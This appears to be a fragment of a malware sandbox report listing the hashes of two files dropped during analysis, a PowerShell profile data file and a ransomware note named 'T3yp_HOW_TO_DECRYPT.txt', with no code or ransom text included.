C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 59f57993716ddfee76351bfe6e939813 |
| SHA1 | 5ed61306e3d2000204b833132c7e3cfba4dc65f8 |
| SHA256 | e7fe5c98669aab08ba2b8a79997007cb6dd084e2b87ca856c2ed779eda5aa4b9 |
| SHA512 | a8c56938ed6589a41032652f98c78239d67223d0099671c927f1faf3df6a38a98832c64084fa1e3f75ea896045e5118a3aed8e0a1733b8cfa777c0f43ed6e95d |
C:\T3yp_HOW_TO_DECRYPT.txt
| MD5 | cf507784737b116dd47b4dc193a97a89 |
| SHA1 | 478c1046fc06ac8d9318ef1b489188e276f7e574 |
| SHA256 | 369186fd878bd200b9822a78153d7f6fb6f52fa2eb2aaef90c4395a9a841f2e6 |
| SHA512 | 7897e831f22d366061baa8318560bee0929d6d48261fb5048358955f7acfa1a5eccca4a21a0918d1f3523d516ffdf449d2bbbf25fe11041219673ef421b92a24 |